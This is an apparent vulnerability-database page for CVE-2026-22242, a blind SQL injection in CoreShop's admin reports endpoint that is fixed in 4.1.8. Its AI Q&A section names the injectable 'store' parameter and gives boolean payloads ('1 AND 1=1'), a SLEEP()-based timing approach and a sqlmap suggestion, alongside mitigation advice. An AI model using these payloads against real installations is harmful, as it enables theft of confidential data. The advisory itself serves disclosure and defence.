CVE-2026-22242
Blind SQL Injection in CoreShop Allows Confidential Data Disclosure
Publication date: 2026-01-08
Last updated on: 2026-01-08
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| coreshop | coreshop | to 4.1.7 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-564 | Using Hibernate to execute a dynamic SQL statement built with user-controlled input can allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-22242 is a blind SQL injection vulnerability in CoreShop versions up to 4.1.7, specifically in the admin reports feature. It allows an authenticated administrator-level user to extract confidential database information by exploiting unsanitized user input that is directly concatenated into SQL queries without proper parameterization. The vulnerability arises mainly from the 'store' parameter being used without validation or prepared statements, enabling attackers to perform boolean-based or time-based SQL injection attacks to infer and extract data from the database. The database user has read-only privileges, so no data modification or service disruption is possible. The issue was fixed by replacing unsafe SQL query constructions with parameterized queries using named placeholders. [1, 2]
How can this vulnerability impact me? :
This vulnerability can lead to unauthorized disclosure of confidential data stored in the CoreShop database. An authenticated administrator-level user can exploit the blind SQL injection to extract sensitive information by manipulating SQL queries. However, because the database account used by the application is read-only and non-DBA, the impact is limited to data confidentiality only. There is no risk of data modification or service disruption from this vulnerability. [2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the /admin/coreshop/report/get-data endpoint for blind SQL injection via the 'store' parameter. Boolean-based detection can be done by modifying the 'store' parameter to values like '1 AND 1=1' (which returns data) and '1 AND 2=1' (which returns empty results). Time-based detection involves injecting payloads with SQL functions like SLEEP() to observe response delays. Automated tools such as sqlmap can be used to confirm the vulnerability and extract database information. Example commands with sqlmap would target the 'store' parameter for injection testing. [2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include enforcing strict type casting of the 'store' parameter to an integer before using it in SQL queries, for example: casting with (int) and returning empty results if the value is invalid (β€ 0). The best practice is to update the code to use prepared statements with parameter binding for the 'store' parameter and all other user inputs, replacing direct concatenation with parameterized queries. Upgrading CoreShop to version 4.1.8 or later, where this issue is patched, is also recommended. [2, 1]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability allows an authenticated administrator-level user to extract confidential database information due to a blind SQL injection flaw. This unauthorized disclosure of confidential data could lead to non-compliance with data protection regulations such as GDPR and HIPAA, which mandate the protection of sensitive personal and health information. Although the database user is read-only and no data modification or service disruption is possible, the confidentiality breach poses a risk to compliance by potentially exposing protected data. The issue has been patched in version 4.1.8 to mitigate this risk. [2]